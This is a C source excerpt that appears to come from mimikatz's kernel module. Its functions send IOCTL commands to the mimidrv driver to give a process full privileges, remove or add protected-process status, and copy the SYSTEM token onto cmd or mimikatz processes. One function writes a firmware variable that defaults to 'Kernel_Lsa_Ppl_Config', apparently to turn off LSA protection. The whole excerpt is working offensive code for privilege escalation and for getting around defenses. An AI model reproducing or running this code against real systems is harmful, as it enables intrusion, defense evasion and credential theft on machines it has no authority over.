NTSTATUS kuhl_m_kernel_do(wchar_t * input)
{
NTSTATUS status = STATUS_SUCCESS;
int argc;
wchar_t ** argv = CommandLineToArgvW(input, &argc);
unsigned short indexCommand;
BOOL commandFound = FALSE;
if(argv && (argc > 0))
{
for(indexCommand = 0; !commandFound && (indexCommand < (sizeof(kuhl_k_c_kernel) / sizeof(KUHL_K_C))); indexCommand++)
{
if(commandFound = _wcsicmp(argv[0], kuhl_k_c_kernel[indexCommand].command) == 0)
{
if(kuhl_k_c_kernel[indexCommand].pCommand)
status = kuhl_k_c_kernel[indexCommand].pCommand(argc - 1, argv + 1);
else
kull_m_kernel_mimidrv_simple_output(kuhl_k_c_kernel[indexCommand].ioctlCode, NULL, 0);
}
}
if(!commandFound)
kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_RAW, input, (DWORD) (wcslen(input) + 1) * sizeof(wchar_t));
}
return status;
}
NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
{
PCWCHAR szPid;
ULONG pid = 0;
if(kull_m_string_args_byName(argc, argv, L"pid", &szPid, NULL))
pid = wcstoul(szPid, NULL, 0);
kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_PROCESS_FULLPRIV, pid ? &pid : NULL, pid ? sizeof(ULONG) : 0);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[])
{
MIMIDRV_PROCESS_PROTECT_INFORMATION protectInfos = {0, {0, 0, {0, 0, 0}}};
PCWCHAR szProcessName, szPid;
BOOL isUnprotect;
if(MIMIKATZ_NT_BUILD_NUMBER >= KULL_M_WIN_MIN_BUILD_VISTA)
{
isUnprotect = kull_m_string_args_byName(argc, argv, L"remove", NULL, NULL);
if(kull_m_string_args_byName(argc, argv, L"process", &szProcessName, NULL))
{
kprintf(L"Process : %s\n", szProcessName);
if(!kull_m_process_getProcessIdForName(szProcessName, &protectInfos.processId))
PRINT_ERROR_AUTO(L"kull_m_process_getProcessIdForName");
}
else if(kull_m_string_args_byName(argc, argv, L"pid", &szPid, NULL))
{
protectInfos.processId = wcstoul(szPid, NULL, 0);
}
else PRINT_ERROR(L"Argument /process:program.exe or /pid:processid needed\n");
if(protectInfos.processId)
{
if(!isUnprotect)
{
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8)
{
protectInfos.SignatureProtection.SignatureLevel = 1;
}
else if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_BLUE)
{
protectInfos.SignatureProtection.SignatureLevel = 0x0f;
protectInfos.SignatureProtection.SectionSignatureLevel = 0x0f;
}
else
{
protectInfos.SignatureProtection.SignatureLevel = 0x3f;
protectInfos.SignatureProtection.SectionSignatureLevel = 0x3f;
protectInfos.SignatureProtection.Protection.Type = 2;
protectInfos.SignatureProtection.Protection.Audit = 0;
protectInfos.SignatureProtection.Protection.Signer = 6;
}
}
kprintf(L"PID %u -> %02x/%02x [%1x-%1x-%1x]\n", protectInfos.processId, protectInfos.SignatureProtection.SignatureLevel, protectInfos.SignatureProtection.SectionSignatureLevel, protectInfos.SignatureProtection.Protection.Type, protectInfos.SignatureProtection.Protection.Audit, protectInfos.SignatureProtection.Protection.Signer);
kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_PROCESS_PROTECT, &protectInfos, sizeof(MIMIDRV_PROCESS_PROTECT_INFORMATION));
}
else PRINT_ERROR(L"No PID\n");
}
else PRINT_ERROR(L"Protected process not available before Windows Vista\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
{
NTSTATUS status;
LPCWSTR szName, szGuid, szAttributes, szData;
UNICODE_STRING uName, uGuid;
GUID guid;
LPBYTE hex = NULL;
DWORD size, attributes, nameLen, structSize;
PMIMIDRV_VARIABLE_NAME_AND_VALUE vnv;
kull_m_string_args_byName(argc, argv, L"name", &szName, L"Kernel_Lsa_Ppl_Config");
kull_m_string_args_byName(argc, argv, L"guid", &szGuid, L"{77fa9abd-0359-4d32-bd60-28f4e78f784b}");
kull_m_string_args_byName(argc, argv, L"attributes", &szAttributes, L"1");
kull_m_string_args_byName(argc, argv, L"data", &szData, L"00000000");
RtlInitUnicodeString(&uName, szName);
RtlInitUnicodeString(&uGuid, szGuid);
attributes = wcstoul(szAttributes, NULL, 0);
status = RtlGUIDFromString(&uGuid, &guid);
if(NT_SUCCESS(status))
{
kprintf(L"Name : %wZ\nVendor GUID: ", &uName);
kuhl_m_sysenv_display_vendorGuid(&guid);
kprintf(L"\nAttributes : %08x (", attributes);
kuhl_m_sysenv_display_attributes(attributes);
kprintf(L")\n");
if(kull_m_string_stringToHexBuffer(szData, &hex, &size))
{
kprintf(L"Length : %u\nData : ", size);
kull_m_string_wprintf_hex(hex, size, 1);
kprintf(L"\n\n");
nameLen = ((DWORD) wcslen(szName) + 1) * sizeof(wchar_t);
structSize = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen + size;
if(vnv = (PMIMIDRV_VARIABLE_NAME_AND_VALUE) LocalAlloc(LPTR, structSize))
{
vnv->Attributes = attributes;
RtlCopyMemory(&vnv->VendorGuid, &guid, sizeof(GUID));
vnv->ValueLength = size;
vnv->ValueOffset = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen;
RtlCopyMemory(vnv->Name, szName, nameLen);
RtlCopyMemory((PBYTE) vnv + vnv->ValueOffset, hex, size);
if(kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_SYSENVSET, vnv, structSize))
kprintf(L"> OK!\n");
LocalFree(vnv);
}
LocalFree(hex);
}
}
else PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status);
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[])
{
MIMIDRV_PROCESS_TOKEN_FROM_TO tokenInfo = {0, 0};
PCWCHAR szFrom, szTo;
if(kull_m_string_args_byName(argc, argv, L"from", &szFrom, NULL))
tokenInfo.fromProcessId = wcstoul(szFrom, NULL, 0);
if(kull_m_string_args_byName(argc, argv, L"to", &szTo, NULL))
tokenInfo.toProcessId = wcstoul(szTo, NULL, 0);
kprintf(L"Token from process %u to process %u\n", tokenInfo.fromProcessId, tokenInfo.toProcessId);
if(!tokenInfo.fromProcessId)
kprintf(L" * from 0 will take SYSTEM token\n");
if(!tokenInfo.toProcessId)
kprintf(L" * to 0 will take all \'cmd\' and \'mimikatz\' process\n");
kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_PROCESS_TOKEN, &tokenInfo, sizeof(MIMIDRV_PROCESS_TOKEN_FROM_TO));
return STATUS_SUCCESS;
}
